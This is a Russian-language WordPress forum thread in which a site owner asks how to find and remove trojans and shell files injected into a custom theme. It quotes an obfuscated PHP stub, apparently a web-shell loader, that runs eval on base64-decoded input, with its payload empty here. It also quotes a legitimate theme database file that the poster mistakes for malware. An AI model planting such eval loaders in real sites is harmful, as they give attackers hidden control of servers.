• Как найти и удалить трояна из темы? Тема установлена уже с год, делал на заказ, менять тему категорически не хотят, чтобы осталась та же. Сейчас на хостинге сжал тему в архив пытался скачать Есет выдал предупреждающее окошко и зип архив скачался пустым.
    Удалил один базес декоде в сингле. один пшп образовался еще не помню в каком файле. Какая то папка создалась untitled folder с файлом footer.php в котором тоже базес декоде этот

    Вообщем содалось масса php файлов с base64_decode сейчас нахожу, удаляю

Просмотр 5 ответов — с 1 по 5 (всего 5)
  • Подскажите в файле темы /uploads/security.php код

    <?php
    //Obfuscation provided by FOPO - Free Online PHP Obfuscator v1.2: http://www.fopo.com.ar
    $z04e85f7c398="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval($z04e85f7c398(
    ""));
    ?>

    Открыл папку с темой на компьютере откуда ее загружал, там security.php нет папка uploads пустая. Я удалил этот файл

    А в папке темы /themify/themify-database.php код

    <?php
    
    /***************************************************************************/
    /*
    /* 	----------------------------------------------------------------------
    /* 						DO NOT EDIT THIS FILE
    /*	----------------------------------------------------------------------
    /*
    /*  			Built by Darcy Clarke. http://themify.me
    /*  				Copyright (C) 2010 Themify
    /*
    /***************************************************************************/
    
    /* 	Database Functions
    /***************************************************************************/
    
    	///////////////////////////////////////////
    	// Initialize DB - Create Row if needed
    	///////////////////////////////////////////
    	function init_db(){
    		global $wpdb, $theme;
    		if(!$wpdb->get_row("SELECT * FROM ".$wpdb->options." WHERE option_name = '".$theme['Name']."_themify_data'")){
    			$wpdb->query("INSERT INTO ".$wpdb->options." SET option_name = '".$theme['Name']."_themify_data', option_value = '', autoload = 'yes'");
    		}
    	}
    
    	///////////////////////////////////////////
    	// Set/Save Data
    	///////////////////////////////////////////
    	function set_data($data){
    		global $wpdb, $theme;
    		foreach($data as $name => $value){
    			if($name == 'save' || $name == 'page'){
    				unset($data[$name]);
    			}
    		}
    		$result = $wpdb->query("UPDATE ".$wpdb->options." SET option_value = '".base64_encode(serialize($data))."' WHERE option_name = '".$theme['Name']."_themify_data'");
    		return $data;
    	}
    
    	///////////////////////////////////////////
    	// Get/Grab Data
    	///////////////////////////////////////////
    	function get_data(){
    		global $wpdb, $theme;
    		$result = $wpdb->get_row("SELECT * FROM ".$wpdb->options." WHERE option_name = '".$theme['Name']."_themify_data'");
    		$data = unserialize(base64_decode($result->option_value));
    		if(is_array($data) && count($data) >= 1){
    			foreach($data as $name => $value){
    				$data[$name] = stripslashes($value);
    			}
    		}
    		return $data;
    	}
    
    ?>

    Вижу присутствует base64_decode что именно мне удалить в этом файле, чтобы не затронуть нужное чего?

    Как найти и удалить трояна из темы?

    Вот так:
    https://wpmag.ru/2012/pochemu-temyi-i-plaginyi-dlya-wordpress-stoit-skachivat-tolko-s-ofitsialnyih-resursov/

    А в файле /themify/themify-database.php приложенном что именно удалить просто это base64_encode ?

    Скачал архив сайта с хостинга, при попытке его разархивировать, антивирусник Eset Smart Security блокировал файлы зараженные. все были трояны — шелл) я заходил в карантин, смотрел путь до файла, потом на хостинг и удалял, в основном были файлы .php и коды base64_decode вписанные в файлы, много в плагинах было. Вроде вычистил все. Архив разархивировал, сканировал ESETом и Доктороб веб лечащей утилитой.

    Есть какой либо антивирусник на русском, который можно установить на сайт (как антивир. на компьютере) чтобы он самостоятельно блокировал вирусы, трояны, вообщем защищал сайт?

    К сожалению я только в общих чертах представляю антивирусы поскольну не пользуюсь виндой. Но разве антивирус под виндой может определить троян или вирус в php файле, или если быть точнее «злодейский код»? что по суди для винды должно являтся простым текстовым файлом?
    А если честно, то на вопросы как нули подправлять тут вряд ли кто то будет отвечать

Просмотр 5 ответов — с 1 по 5 (всего 5)
  • Тема «Найти и удалить трояна из темы» закрыта для новых ответов.